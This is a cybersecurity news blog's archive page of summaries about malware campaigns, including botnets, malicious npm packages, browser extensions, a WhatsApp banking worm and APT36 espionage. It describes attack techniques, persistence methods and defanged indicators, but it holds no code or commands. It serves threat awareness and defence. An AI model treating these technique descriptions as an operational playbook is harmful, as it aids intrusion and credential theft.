Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label malware. Show all posts
User Security
Browser Extension GhostPoster LayerX malware User Security

GhostPoster Malware Campaign Exposes Browser Extension Risks

 

A stealthy malware operation has been discovered by cybersecurity researchers, which remained undetected for a period of up to five years and accumulated more than 840,000 downloads on various platforms. The research began with a study by Koi Security of a Firefox browser extension called GhostPoster, which embedded its malicious code in a seemingly innocuous PNG image file. Such a trick allowed the malware to evade static analysis and manual reviews by browser markets. 

Based on the findings of Koi Security, the LayerX researchers decided to dig deeper into the infrastructure and discovered 17 more extensions that used the same backend infrastructure and had the same tactics, techniques, and procedures (TTPs). In total, these extensions had more than 840,000 downloads, with some of them remaining undetected on the users' devices for almost five years. LayerX researchers also discovered a more complex variant of the malware that used other evasion techniques and had 3,822 downloads on its own. 

The operation emanates from Microsoft Edge and then methodically moves to chrome and Firefox, which looks like the work of a patient, evolving threat actor that is focused on stealth and trust-building. The extensions used to mimic legitimate functionality at first, avoiding suspicion, while the infrastructure was in place after many years. This stress test mentality highlights how cybercriminals abuse browser extensions as a low-friction vector to compromise user security without raising alarms in the short term. 

Following the revelations, Mozilla and Microsoft immediately removed the offending extensions from their official stores, preventing further downloads. However, this removal does nothing to those copies already installed on users browsers, meaning millions might be left vulnerable to potential attacks unless they take action. LayerX’s blog stressed that users need to take an active role in mitigating ongoing risk by reviewing for and deleting the extensions. 

Browser extensions have become a lucrative target for cybercriminals as hackers exploit the deep access these extensions have to browsing data and permissions, raising the stakes for vigilance in the evolving threat landscape. Users are advised to regularly review the installed add-ons' permissions, disable the ones they don't use or need, and remove the ones they don't trust. This is a warning that even extensions or add-ons that have been trusted for a long time can potentially contain malicious code, and it effectively calls for those using any major browser to adopt a more proactive approach to security.
Read more »
malware
Aisuru botnet Android Malware Black Lotus Labs command and control servers cybersecurity research DDOS Attacks Kimwolf botnet Lumen security malware

Lumen Disrupts Aisuru–Kimwolf Botnet Powering Massive DDoS Attacks

 

Lumen Technologies’ Black Lotus Labs has successfully disrupted more than 550 command-and-control (C2) servers connected to the Aisuru and Kimwolf botnets, a large-scale malicious infrastructure widely used for distributed denial-of-service (DDoS) attacks and residential proxy abuse.

Aisuru operates as a DDoS-for-hire platform and deliberately avoids targeting government and military entities. However, broadband service providers have borne the brunt of its activity, with attacks surpassing 1.5Tb/sec originating from compromised customer devices, causing severe service interruptions.

Similar to other TurboMirai-based botnets, Aisuru includes enhanced DDoS capabilities alongside multifunctional features. These allow threat actors to engage in a range of illegal operations such as credential stuffing, AI-powered web scraping, spam campaigns, phishing attacks, and proxy services.

The botnet launches assaults using UDP, TCP, and GRE flood techniques, leveraging medium-sized packets with randomized ports and flags. Traffic volumes exceeding 1Tb/sec from infected customer premises equipment (CPEs) have disrupted broadband networks, while packet floods surpassing 4 billion packets per second have led to router line card failures.

Kimwolf, a recently identified Android-based botnet closely associated with Aisuru, has compromised more than 1.8 million devices and generated over 1.7 billion DDoS commands, according to cybersecurity firm XLab.

Primarily targeting Android TV boxes, the Kimwolf botnet is built using the Android NDK and includes capabilities such as DDoS attacks, proxy forwarding, reverse shell access, and file management. To conceal its operations, it encrypts sensitive information using a simple Stack XOR method, employs DNS over TLS for communication obfuscation, and verifies C2 commands through elliptic curve digital signatures. Newer variants also use EtherHiding, leveraging blockchain-based domains to evade takedown efforts.

Kimwolf variants follow a consistent naming convention of “niggabox + v[number],” with versions v4 and v5 currently observed in the wild. Researchers who seized control of a single C2 domain recorded interactions from approximately 2.7 million IP addresses within three days, reinforcing estimates that infections exceed 1.8 million devices. The botnet’s globally distributed infrastructure, multiple C2 servers, and varied versions make precise infection counts difficult.

Although Kimwolf borrows elements from the Aisuru codebase, its operators significantly modified it to avoid detection. While traffic proxying is its primary function, the botnet is capable of executing large-scale DDoS campaigns. This was evident during a three-day window between November 19 and 22, when it issued 1.7 billion attack commands.

Lumen observed daily bot traffic to Aisuru C2 servers rise sharply from 50,000 to 200,000 connections in September 2025. Upon validating the emergence of a new botnet, the company blocked the traffic and null-routed more than 550 C2 servers.

By examining C2 infrastructure and residential proxy traffic, researchers traced links to Canadian IP addresses and shared this intelligence with law enforcement agencies.

“The Canadian IPs in question were using SSH to access 194.46.59[.]169, which resolved to proxy-sdk.14emeliaterracewestroxburyma02132[.]su. In short order, we would learn that the Aisuru backend C2 we were tracking adopted the domain name client.14emeliaterracewestroxburyma02132[.]su, a similarity that further tied these servers together” reads the report published by Lumen.

In early October, Black Lotus Labs detected infrastructure shifts signaling the rise of the Kimwolf botnet. Its growth was rapid, adding hundreds of thousands of infected devices within weeks, largely through exploitation of insecure residential proxy services. By mid-October, infections had reached approximately 800,000 devices, with the botnet actively scanning proxy networks to accelerate expansion.

Black Lotus Labs initiated disruption efforts against Kimwolf in October by swiftly null-routing its C2 servers. While operators were able to reestablish operations within hours, Lumen persistently blocked new infrastructure as it surfaced. Through continuous monitoring, collaboration with industry partners, and integration of threat indicators into its security products, Lumen worked to reduce the botnet’s operational capacity over time.

“To date, we have null-routed over 550 Aisuru/Kimwolf servers in 4 months as part of our efforts to combat this botnet, leading its operators to some distress, as noted in Xlabs’ post, showing the actors addressing Lumen with profanity in one DDoS payload” concludes the report.


Read more »
malware
Aisuru Android Botnets IP Address malware

Researchers Disrupt Major Botnet Network After It Infects Millions of Android Devices

 


Security researchers have dismantled a substantial portion of the infrastructure powering the Kimwolf and Aisuru botnets, cutting off communication to more than 550 command-and-control servers used to manage infected devices. The action was carried out by Black Lotus Labs, the threat intelligence division of Lumen Technologies, and began in early October 2025.

Kimwolf and Aisuru operate as large-scale botnets, networks of compromised devices that can be remotely controlled by attackers. These botnets have been used to launch distributed denial-of-service attacks and to route internet traffic through infected devices, effectively turning them into unauthorized residential proxy nodes.

Kimwolf primarily targets Android systems, with a heavy concentration on unsanctioned Android TV boxes and streaming devices. Prior technical analysis showed that the malware is delivered through a component known as ByteConnect, which may be installed directly or bundled into applications that come preloaded on certain devices. Once active, the malware establishes persistent access to the device.

Researchers estimate that more than two million Android devices have been compromised. A key factor enabling this spread is the exposure of Android Debug Bridge services to the internet. When left unsecured, this interface allows attackers to install malware remotely without user interaction, enabling rapid and large-scale infection.

Follow-up investigations revealed that operators associated with Kimwolf attempted to monetize the botnet by selling access to the infected devices’ internet connections. Proxy bandwidth linked to compromised systems was offered for sale, allowing buyers to route traffic through residential IP addresses in exchange for payment.

Black Lotus Labs traced parts of the Aisuru backend to residential SSH connections originating from Canadian IP addresses. These connections were used to access additional servers through proxy infrastructure, masking malicious activity behind ordinary household networks. One domain tied to this activity briefly appeared among Cloudflare’s most accessed domains before being removed due to abuse concerns.

In early October, researchers identified another Kimwolf command domain hosted on infrastructure linked to a U.S.-based hosting provider. Shortly after, independent reporting connected multiple proxy services to a now-defunct Discord server used to advertise residential proxy access. Individuals associated with the hosting operation were reportedly active on the server for an extended period.

During the same period, researchers observed a sharp increase in Kimwolf infections. Within days, hundreds of thousands of new devices were added to the botnet, with many of them immediately listed for sale through a single residential proxy service.

Further analysis showed that Kimwolf infrastructure actively scanned proxy services for vulnerable internal devices. By exploiting configuration flaws in these networks, the malware was able to move laterally, infect additional systems, and convert them into proxy nodes that were then resold.

Separate research uncovered a related proxy network built from hundreds of compromised home routers operating across Russian internet service providers. Identical configurations and access patterns indicated automated exploitation at scale. Because these devices appear as legitimate residential endpoints, malicious traffic routed through them is difficult to distinguish from normal consumer activity.

Researchers warn that the abuse of everyday consumer devices continues to provide attackers with resilient, low-visibility infrastructure that complicates detection and response efforts across the internet.

Read more »
VoidLink Framework
Advanced Persistent Threats Cloud Infrastructure Threats Cloud Security Container Security Cyber Threat Intelligence malware supply chain attacks VoidLink Framework

VoidLink Malware Poses Growing Risk to Enterprise Linux Cloud Deployments


 

A new cybersecurity threat has emerged beneath the surface of the modern digital infrastructure as organizations continue to increase their reliance on cloud computing. Researchers warn that a subtle but dangerous shift is occurring beneath the surface. 

According to Check Point Research, a highly sophisticated malware framework known as VoidLink, is being developed by a group of cyber criminals specifically aimed at infiltrating and persisting within cloud environments based on Linux. 

As much as the industry still concentrates on Windows-centric threats, VoidLink's appearance underscores a strategic shift by advanced threat actors towards Linux-based systems that are essential to the runtime of cloud platforms, containerized workloads, and critical enterprise services, even at a time when many of the industry's defensive focus is still on Windows-centric threats. 

Instead of representing a simple piece of malicious code, VoidLink is a complex ecosystem designed to deliver long-term, covert control over compromised servers by establishing long-term, covert controls over the servers themselves, effectively transforming cloud infrastructure into an attack vector all its own. 

There is a strong indication that the architecture and operational depth of this malware suggests it was designed by well-resourced, professional adversaries rather than opportunistic criminals, posing a serious challenge for defenders who may not know that they are being silently commandeered and used for malicious purposes.

Check Point Research has published a detailed analysis of VoidLink to conclude that it is not just a single piece of malicious code; rather, it is a cloud-native, fully developed framework that is made up of customized loaders, implants, rootkits, and a variety of modular plugins that allows operators to extend, modify, and repurpose its functionality according to their evolving operational requirements. 

Based on its original identification in December 2025, the framework was designed with a strong emphasis on dependability and adaptability within cloud and containerized environments, reflecting the deliberate emphasis on persistence and adaptability within the framework. 

There were many similarities between VoidLink and Cobalt Strike's Beacon Object Files model, as the VoidLink architecture is built around a bespoke Plugin API that draws conceptual parallels to its Plugin API. There are more than 30 modules available at the same time, which can be shifted rapidly without redeploying the core implant as needed. 

As the primary implant has been programmed in Zig, it can detect major cloud platforms - including Amazon Web Services, Google Cloud, Microsoft Azure, Alibaba, and Tencent - and adjust its behavior when executed within Docker containers or Kubernetes pods, dynamically adjusting itself accordingly. 

Furthermore, the malware is capable of harvesting credentials linked to cloud services as well as extensively used source code management platforms like Git, showing an operational focus on software development environments, although the malware does not appear to be aware of the environment. 

A researcher has identified a framework that is actively maintained as the work of threat actors linked to China, which emphasizes a broader strategic shift away from Windows-centric attacks toward Linux-based attacks which form the basis for cloud infrastructures and critical digital operations, and which can result in a range of potential consequences, ranging from the theft of data to the compromise of large-scale supply chains. 

As described by its developers internally as VoidLink, the framework is built as a cloud-first implant that uses Zig, the Zig programming language to develop, and it is designed to be deployed across modern, distributed environments. 

Depending on whether or not a particular application is being executed on Docker containers or Kubernetes clusters, the application dynamically adjusts its behavior to comply with that environment by identifying major cloud platforms and determining whether it is running within them. 

Furthermore, the malware has been designed to steal credentials that are tied to cloud-based services and popular source code management systems, such as Git, in addition to environmental awareness. With this capability, software development environments seem to be a potential target for intelligence collection, or to be a place where future supply chain operations could be conducted.

Further distinguishing VoidLink from conventional Linux malware is its technical breadth, which incorporates rootkit-like techniques, loadable kernel modules, and eBPF, as well as an in-memory plugin system allowing for the addition of new functions without requiring people to reinstall the core implant, all of which is supported by LD_PRELOAD. 

In addition to adapting evasion behavior based on the presence of security tooling, the stealth mechanism also prioritizes operational concealment in closely monitored environments, which in turn alters its evasion behavior accordingly. 

Additionally, the framework provides a number of command-and-control mechanisms, such as HTTP and HTTPS, ICMP, and DNS tunneling, and enables the establishment of peer-to-peer or mesh-like communication among compromised hosts through the use of a variety of command-and-control mechanisms. There is some evidence that the most components are nearing full maturity.

A functional command-and-control server is being developed and an integrated web-based management interface is being developed that facilitates centralized control of the agents, implants, and plugins by operators. To date, no real-world infection has been confirmed. 

The final purpose of VoidLink remains unclear as well, but based on its sophistication, modularity, and apparent commercial-grade polish, it appears to be designed for wider operational deployment, either as a tailored offensive tool created for a particular client or as a productized offensive framework that is intended for broader operational deployment. 

Further, Check Point Research has noted that VoidLink is accompanied by a fully featured, web-based command-and-control dashboard that allows operators to do a centralized monitoring and analysis of compromised systems, including post-exploitation activities, to provide them with the highest level of protection. 

Its interface, which has been localized for Chinese-language users, allows operations across familiar phases, including reconnaissance, credential harvesting, persistence, lateral movement, and evidence destruction, confirming that the framework is designed to be used to engage in sustained, methodical campaigns rather than opportunistic ones.

In spite of the fact that there were no confirmed cases of real-world infections by January 2026, researchers have stated that the framework has reached an advanced state of maturity—including an integrated C2 server, a polished dashboard for managing operations, and an extensive plugin ecosystem, which indicates that its deployment could be imminent.

According to the design philosophy behind the malware, the goal is to gain long-term access to cloud environments and keep a close eye on cloud users. This marks a significant step up in the sophistication of Linux-focused malware. It was argued by the researchers in their analysis that VoidLink's modular plug-ins extend their reach beyond cloud workloads to the developer and administrator workstations which interact directly with these environments.

A compromised system is effectively transformed into a staging ground that is capable of facilitating further intrusions or potential supply chain compromises if it is not properly protected. Their conclusion was that this emergence of such an advanced framework underscores a broader shift in attackers' interest in Linux-based cloud and container platforms, away from traditional Windows-based targets. 

This has prompted organizations to step up their security efforts across the full spectrum of Linux, cloud, and containerized infrastructures, as attacks become increasingly advanced. Despite the fact that VoidLink was discovered by chance in the early days of cloud adoption, it serves as a timely reminder that security assumptions must evolve as rapidly as the infrastructure itself. 

Since attackers are increasingly investing in frameworks built to blend into Linux and containerized environments, organizations are no longer able to protect critical assets by using perimeter-based controls and Windows-focused threat models. 

There is a growing trend among security teams to adopt a cloud-aware defense posture that emphasizes continuous monitoring, least-privilege access, and rigorous monitoring of the deployment of development and administrative endpoints that are used for bridging on-premise and cloud platforms in their development and administration processes. 

An efficient identity management process, hardened container and Kubernetes configurations, and increased visibility into east-west traffic within cloud environments can have a significant impact on the prevention of long-term, covert compromises within cloud deployments.

There is also vital importance in strengthening collaboration between the security, DevOps, and engineering teams within the platform to ensure that detection and response capabilities keep pace with the ever-changing and adaptive threat landscape. 

Modern enterprises have become dependent on digital infrastructure to support the operation of their businesses, and as frameworks like VoidLink are closer to real-world deployment, investing in Linux and cloud security at this stage is important not only for mitigating emerging risks, but also for strengthening the resilience of the infrastructure that supports them.
Read more »
malware
AI Cloud Data Google Ads Internet malware

n8n Supply Chain Attack Exploits Community Nodes In Google Ads Integration to Steal Tokens


Hackers were found uploading a set of eight packages on the npm registry that pretended as integrations attacking the n8n workflow automation platform to steal developers’ OAuth credentials. 

About the exploit 

The package is called “n8n-nodes-hfgjf-irtuinvcm-lasdqewriit”, it copies Google Ads integration and asks users to connect their ad account in a fake form and steal OAuth credentials from servers under the threat actors’ control. 

Endor Labs released a report on the incident. "The attack represents a new escalation in supply chain threats,” it said. Adding that “unlike traditional npm malware, which often targets developer credentials, this campaign exploited workflow automation platforms that act as centralized credential vaults – holding OAuth tokens, API keys, and sensitive credentials for dozens of integrated services like Google Ads, Stripe, and Salesforce in a single location," according to the report. 

Attack tactic 

Experts are not sure if the packages share similar malicious functions. But Reversing labs Spectra Assure analysed a few packages and found no security issues. In one package called “n8n-nodes-zl-vietts,” it found a malicious component with malware history. 

The campaign might still be running as another updated version of the package “n8n-nodes-gg-udhasudsh-hgjkhg-official” was posted to npm recently.

Once installed as a community node, the malicious package works as a typical n8n integration, showing configuration screens. Once the workflow is started, it launches a code to decode the stored tokens via n8n’s master key and send the stolen data to a remote server. 

This is the first time a supply chain attack has specially targeted the n8n ecosystem, with hackers exploiting the trust in community integrations. 

New risks in ad integration 

The report exposed the security gaps due to untrusted workflows integration, which increases the attack surface. Experts have advised developers to audit packages before installing them, check package metadata for any malicious component, and use genuine n8n integrations. 

The findings highlight the security issues that come with integrating untrusted workflows, which can expand the attack surface. Developers are recommended to audit packages before installing them, scrutinize package metadata for any anomalies, and use official n8n integrations.

According to researchers Kiran Raj and Henrik Plate, "Community nodes run with the same level of access as n8n itself. They can read environment variables, access the file system, make outbound network requests, and, most critically, receive decrypted API keys and OAuth tokens during workflow execution.”

Read more »
rotterdam
Antwerp Hacking IT system malware Netherlands rotterdam

Man Sentenced to Seven Years for Hacking Port IT Systems to Enable Drug Imports

 



A Dutch appeals court has sentenced a 44-year-old man to seven years in prison for his involvement in cyber intrusions targeting major European ports and for using those breaches to support drug trafficking operations.

The ruling was issued by the Amsterdam Court of Appeal, which reviewed a case that began with the man’s arrest in 2021. He was initially convicted a year later by the Amsterdam District Court on multiple charges, including illegal access to computer systems, attempted extortion, and assisting in the import of narcotics. Following that decision, the defendant challenged the verdict, arguing that key evidence used against him had been obtained unlawfully.

At the center of the appeal was the use of messages collected from Sky ECC, an encrypted communication platform. Law enforcement agencies in Europe gained access to the service in 2021 as part of a coordinated investigation into organized crime. That operation led to the arrest of the platform’s leadership and numerous users, with legal proceedings continuing into the following years. The defense claimed that the interception of these communications violated procedural safeguards and undermined the fairness of the trial.

The appeals court rejected those objections, stating that the defense failed to demonstrate how the collection of Sky ECC messages breached the defendant’s legal rights. As a result, most of the original findings were upheld.

However, the court did overturn one charge related to a plan to import approximately 5,000 kilograms of cocaine. Despite this, judges maintained the remaining convictions, including those tied to cybercrime and drug-related offenses.

Court findings show that the man worked with others to breach IT systems used by port operations in Rotterdam and Barendrecht in the Netherlands, as well as Antwerp in Belgium. These systems are responsible for managing logistics and cargo movement within the ports. By gaining unauthorized access, the group aimed to manipulate information so that illegal drug shipments could pass through undetected.

The intrusion was carried out by infecting internal systems at a port logistics company. Malware was introduced through USB devices that were connected by company employees. Authorities have not clarified whether those individuals were coerced, deceived, or willingly involved.

Once the malware was installed, the attacker was able to deploy remote access tools. This allowed him to extract data from internal databases and monitor information as it moved through the network, giving criminal groups operational insight into port activities.

Investigators also found that between mid-September 2020 and late April 2021, the man attempted to sell malicious software along with instructions for its use, working in coordination with others.

Taking into account the hacking activities, the facilitation of drug trafficking, the import of 210 kilograms of cocaine into the Netherlands, and attempted extortion, the court confirmed a final prison sentence of seven years.

Read more »
WhatsApp Web Exploitation
Astaroth Banking Trojan Banking Malware Evolution Brazilian Cyber Threats Financial Credential Theft malware Modular Malware Architecture WhatsApp Web Exploitation

WhatsApp-Based Worm Drives Rapid Expansion of Astaroth Malware in Brazil


After being exposed to a new and more aggressive distribution campaign involving the Astaroth banking trojan, which is a long-standing malware strain known for targeting financial users in the country, the cyber threat landscape in Brazil is once again coming under scrutiny. 


Astaroth has recently launched a new operation, internally referred to as Boto Cor-de-Rosa, which marks a significant shift in the organization's propagation methods by incorporating WhatsApp Web into its infection chain that marks a major shift in its propagation strategies. 

A malicious script in this campaign is capable of harvesting the contact list of the victim on WhatsApp and autonomously sending malicious messages to those contacts, effectively turning that compromised WhatsApp account into a self-propagating infection vector. 

A number of analysts are observing the Astaroth Boto Cor-de-Rosa operation as a clear indicator of a sharp rise in both technical sophistication and social engineering precision. Using rapid self-propagation capabilities and longstanding ability to steal banking credentials, this operation is a very sophisticated one. 

There is a dual-purpose architecture at the heart of this campaign that allows the malware to spread autonomously, while at the same time monitoring the online activity of the victims. It is a simple process of spreading malicious messages via WhatsApp that uses the natural, culturally familiar Portuguese language to reach users, capitalizing on the inherent trust users have placed in communications they receive from familiar people. 

In spite of the fact that the banking module is discreetly installed in the background, it keeps track of a victim's browser sessions and activates only when the victim visits a financial institution or payment service website. It then attempts to intercept sensitive information, such as usernames and passwords. 

Researchers stress that because of the fusion between worm-like distribution and financial espionage, there is a higher risk to Brazilian banking customers as the threat of infection is heightened along with the threat of precision data theft that it presents. 

In addition to the campaign's effectiveness, the campaign's effectiveness is further enhanced by the fact that it has a very narrow geographic focus, with lures that are tailored exclusively for Brazilian users and that are dynamically adjusted to local time zones using greetings such as "Bom dia," and "Good afternoon.". 

When the level of cultural customization of the phishing campaign is paired with WhatsApp's being a deeply trusted and widely used communication channel in Brazil, the user suspicion is significantly lowered, which in turn enhances the success rates of infections as compared with conventional email-based phishing campaigns. 

Boto Cor-de-Rosa also represents an important evolution step for Astaroth from the standpoint of a technical point of view, as it introduces a Python-based variant of the WhatsApp worm in addition to the trojan's established Delphi core. 

A number of analysts perceive the shift from a traditional delivery vector, which is based on a technical flaw, toward a modular, multilingual design as a deliberate move by the operators to enhance flexibility, evade detection, and decouple credential theft from propagation. 

Rather than relying on traditional delivery vectors, they are instead opting to exploit human trust rather than technical weaknesses by developing relationship-driven attacks.

Although Astaroth's primary payload is still crafted in Delphi, and its installer is still crafted in Visual Basic scripting, analysts noticed that the newly introduced WhatsApp worm component has been written in Python, which highlights the operators' increasing reliance on modular, multi-lingual development, as evidenced by the new worm component. 

By leveraging region-specific social engineering lures, intimate knowledge of the network ecosystems in local areas, and widely trusted communication platforms, Astaroth achieves high infection rates, maximizing its reach and sustaining high infection rates throughout the campaign. 

Astaroth, a banking trojan that was identified nearly a decade ago, was also known as Guildma and has consistently maintained a persistent presence in the cybercrime ecosystem since 2015, becoming one of the most prominent banking trojans targeting Latin America, primarily Brazil. 

Since this malware has historically been distributed through large-scale phishing campaigns, it has emerged in recent years through two distinct malicious threat clusters. The two threats have been identified as PINEAPPLE and Water Makara, both of which are targeting organizations through deceptive email lures to initiate an infection campaign.

There is a growing trend among threat actors to forego traditional delivery methods and utilize WhatsApp as a means of propagating their attacks as a proxy channel - a tactic that lends itself to all-out adoption among Brazilian users, given WhatsApp's near-ubiquitous status among them.

The security industry has documented numerous instances in which such a technique has been used, for instance Water Saci's use of WhatsApp as a platform for disseminating the Maverick trojan and a modified variant of Casbaneiro. Sophos published a report in November 2025 that described a multi-stage campaign known as STAC3150 as the method used to distribute Astaroth by WhatsApp messages, and the majority of those infections have been reported in Brazil. 

The number of confirmed infections has been reduced to about 9 percent in the United States and Austria, which are less prevalent. There has been a persistent operation in place since at least late September 2025 in which ZIP archives containing downloader components designed to retrieve PowerShell or Python-based scripts that can harvest WhatsApp user information in order to spread it onward, along with MSI installers containing the bank trojan itself, have been distributed since then. 

Despite the latest reports from Acronis, the Acronis findings indicate that this technique from the past has not stopped being used in active spam campaigns, because malicious ZIP files sent via WhatsApp remain the primary vector for the dissemination of Astaroth attacks.

There are several factors that determine the effectiveness of a campaign such as Astaroth, primarily a functional split, which conforms to the recommendations made by Acronis. This functional split ensures both maximum reach and the maximum financial return on the investment. 

A victim can be the victim of sophisticated malware as soon as they execute a malicious ZIP file delivered by WhatsApp. This malware will deploy two distinct components once they run the malicious ZIP file: one for propagation, which drives continued spread of the malware, and another for credential theft. 

Propagation is the process of harvesting the victim's WhatsApp contact list, and distributing the new malicious ZIP archives to each contact automatically as they are created, creating an infection loop that is persistent and self-sustaining. 

A parallel component of the malware, the banking component, remains dormant in the background, silently monitoring browsing activity. When the user visits a banking or financial service website, the malware will activate silently, capturing credentials and facilitating fraudulent transactions when the user enters the site.

Technically, the attack relies on an obfuscated Visual Basic script concealed within the ZIP archive, serving as the initial downloader for the malicious program. Using this script, both the Astaroth banking trojan as well as a WhatsApp spreader based on Python will be retrieved and executed. 

As for the trojan itself, it is installed via an MSI dropper using an AutoIt interpreter and a loaded loader to decrypt and run the payload, a method that is meant to blend malicious activities with trusted tools and thus avoid detection. During the process, the Python module is installed and allows the worm-like propagation of the malware through WhatsApp. 

It sends localized, time-sensitive messages to stolen contacts in Portuguese autonomously while tracking delivery metrics and exfiltrating contact information to a remote server while enabling autonomous distribution through WhatsApp. As Researchers say, this campaign demonstrates how modern banking malware is increasingly combining stealthy credential theft with automated social engineering and trusted messaging platforms for speeding up distribution and exploiting users' trust as a way to efficiently spread their malware. 

Cybercriminals are increasingly putting much emphasis on social trust and platform familiarity as opposed to simply technical exploits to gain access to targets as evidenced by the Boto Cor-de-Rosa campaign, which illustrates a wider shift in the threat landscape. 

Embedding malicious activity inside everyday communication channels gives campaigns like Astaroth the capability of blurring the line between routine digital interactions and active threats, which makes it more difficult for users and organizations to detect and prevent these threats. In order to protect themselves from identity theft, Brazilian consumers are advised to be very cautious about unsolicited files or links, even when they appear to come from a known contact. 

They should also be wary of compressed attachments that are sent over instant messaging platforms. It has been recommended that financial institutions and large enterprises, meanwhile, should expand user awareness programs and behavioral monitoring, and make investments in threat detection strategies that take into account message-based malware delivery mechanisms. 

There are numerous ways that attackers are developing modular and multi-lingual malware frameworks and exploiting trusted ecosystems at a mass scale. Coordinating efforts among cybersecurity vendors, platform providers, and the end users will be critical in order to limit the reach and impact of such campaigns in the future.

In the context of the Astaroth operation, it should be noted that most effective defenses are not only dependent on technical controls, but also on vigilance, education, and being knowledgeable about the way modern threats adapt to human behavior and how to stop them.
Read more »
software supply chain attack
cloud secret theft developer credential theft JavaScript security malware NPM malware Shai Hulud malware software supply chain attack

New Shai Hulud Malware Variant Turns Developers Into Supply Chain Attack Vectors, Expel Warns

 

A newly released report from managed detection and response firm Expel Inc. reveals an advanced variant of the Shai Hulud malware, highlighting how software supply chain attacks are moving beyond isolated malicious packages to large-scale, self-spreading campaigns that exploit developers as unwitting distribution channels.

Originally detected in September, the Shai Hulud malware campaign targets the JavaScript ecosystem and prioritizes supply chain compromise over conventional endpoint attacks. It spreads through trojanized Node Package Manager (npm) packages designed to steal credentials and replicate across developer environments.

According to Expel, the latest iteration of Shai Hulud automates the takeover of developer systems and the npm registry by combining credential harvesting, cloud secret extraction and rapid self-propagation. The malware is typically triggered during an npm install process on a developer’s machine or within continuous integration and continuous delivery pipelines.

Once activated, the malicious package initiates a two-stage infection process. In the first phase, it prepares the environment by installing the Bun JavaScript runtime if it is not already available. The second phase launches a highly obfuscated background payload responsible for stealing credentials, exfiltrating data and spreading the infection further.

The malware conducts extensive searches for sensitive information stored locally, including cloud access keys, npm publishing tokens and GitHub login credentials. It also uses the TruffleHog security scanning tool to comb through a victim’s home directory, identifying hard-coded secrets hidden in source code, configuration files and git history.

When cloud credentials are discovered, Shai Hulud escalates its activity by directly querying cloud-based secret management services such as Amazon Web Services Inc.’s Secrets Manager, Microsoft Corp.’s Azure Key Vault and Google LLC’s Cloud Secret Manager to retrieve additional confidential data.

Rather than relying on traditional command-and-control infrastructure, the malware blends into normal developer workflows by abusing GitHub services. Stolen credentials and system details are exfiltrated to newly created public GitHub repositories, while infected systems are registered as self-hosted GitHub Actions runners, providing attackers with persistent remote access.

To maintain and expand the campaign, Shai Hulud exploits compromised developer accounts by injecting malicious code into other npm packages owned by the victim. These altered packages are then automatically published to the registry, allowing the malware to continue spreading.

Expel estimates that the campaign has affected more than 25,000 repositories and hundreds of npm packages, including those linked to widely used developer tools. The report concludes that Shai Hulud signals a fundamental change in supply chain risk by targeting the trust mechanisms underlying modern software development. While the current activity is focused on npm, Expel cautions that similar attacks could surface in other ecosystems built on comparable trust models, such as PyPI, RubyGems and Composer.
Read more »
WhatsApp Web API malware
lotusbail npm malicious npm package malware WhatsApp message stealing WhatsApp Web API malware

Malicious NPM Package Masquerading as WhatsApp Web API Steals Messages and Account Access

 

A harmful package hosted on the Node Package Manager (NPM) registry has been found impersonating a genuine WhatsApp Web API library, with the intent to spy on user activity. Disguised as a legitimate developer tool, the package is designed to siphon WhatsApp messages, harvest contact details, and ultimately take control of user accounts.

The threat originates from a fork of the widely used WhiskeySockets Baileys project. While it offers the same expected functionality, the compromised package was published on npm under the name lotusbail and has been available for at least six months, during which it was downloaded over 56,000 times.

The issue was uncovered by researchers at supply-chain security firm Koi Security. Their analysis revealed that the package is capable of capturing WhatsApp authentication tokens and session keys, monitoring all incoming and outgoing messages, and extracting sensitive data such as contact lists, media, and shared documents.

"The package wraps the legitimate WebSocket client that communicates with WhatsApp. Every message that flows through your application passes through the malware's socket wrapper first," the researchers explain.
"When you authenticate, the wrapper captures your credentials. When messages arrive, it intercepts them. When you send messages, it records them."

According to the researchers, the stolen data is protected before exfiltration using a custom RSA-based encryption scheme combined with several layers of obfuscation. These techniques include Unicode manipulation, LZString compression, and AES encryption, making detection and analysis significantly more difficult.

Beyond data theft, the malicious code also secretly pairs the attacker’s device with the victim’s WhatsApp account using WhatsApp’s own device-linking mechanism. This allows long-term access to the account even if the infected NPM package is later removed. The unauthorized access persists until the victim manually reviews and removes unknown linked devices from their WhatsApp settings.

Koi Security also noted that lotusbail employs 27 infinite loop traps to frustrate debugging efforts, a tactic that likely helped it evade detection for an extended period.

Developers who may have installed the package are strongly advised to uninstall it immediately and review their WhatsApp accounts for any unfamiliar linked devices. Koi Security further warns that simply scanning source code is insufficient; developers should also observe runtime behavior, watching for suspicious outbound connections or abnormal activity during authentication when introducing new dependencies.
Read more »
PDF
APT36 Avast avira cyber espionage HTTP Kaspersky malware PDF

Advanced Malware Campaigns Target Government and Academic Organizations


Cybersecurity researchers have identified ongoing cyber-espionage campaigns targeting government departments, academic institutions, and strategically important organizations across South Asia. The activity has been attributed to two established threat actors, Transparent Tribe and Patchwork, both known for maintaining long-term access to compromised systems.

Transparent Tribe, also tracked as APT36, has been active since at least 2013 and is associated with repeated intelligence-gathering operations against Indian organizations. In its latest campaign, the group used spear-phishing emails carrying ZIP archives that contained Windows shortcut files disguised as legitimate PDF documents. These shortcut files included real PDF content to appear harmless.

When opened, the shortcut launches a hidden process using the Windows utility mshta.exe, which runs an HTML Application script. This script decrypts and loads the final remote access trojan directly into system memory while simultaneously opening a decoy PDF to avoid alerting the victim. The script also interacts with Windows through ActiveX components, such as WScript.Shell, allowing it to analyze the environment and adjust execution behavior.

The malware adapts its persistence strategy based on the antivirus software installed. On systems with Kaspersky, it creates a working directory under C:\Users\Public\core and uses startup shortcuts to relaunch the malicious script. If Quick Heal is detected, it relies on batch files and startup entries. On machines running Avast, AVG, or Avira, the payload is copied directly into the Startup folder. If no recognized antivirus is found, the malware combines batch execution, registry-based persistence, and delayed payload deployment.

A second-stage component includes a malicious DLL named iinneldc.dll, which functions as a fully featured RAT. It allows attackers to remotely control the system, manage files, steal data, capture screenshots, monitor clipboard activity, and manipulate running processes.

Researchers also identified a separate APT36 campaign using a shortcut file disguised as a government advisory PDF. This file retrieves an installer from a remote server, extracts multiple malicious files, displays a legitimate advisory issued by Pakistan’s national CERT, and establishes persistence through registry modifications. One DLL communicates with a hard-coded command-and-control server using reversed strings to hide command endpoints and supports system registration, heartbeat signals, command execution, and anti-virtual-machine checks.

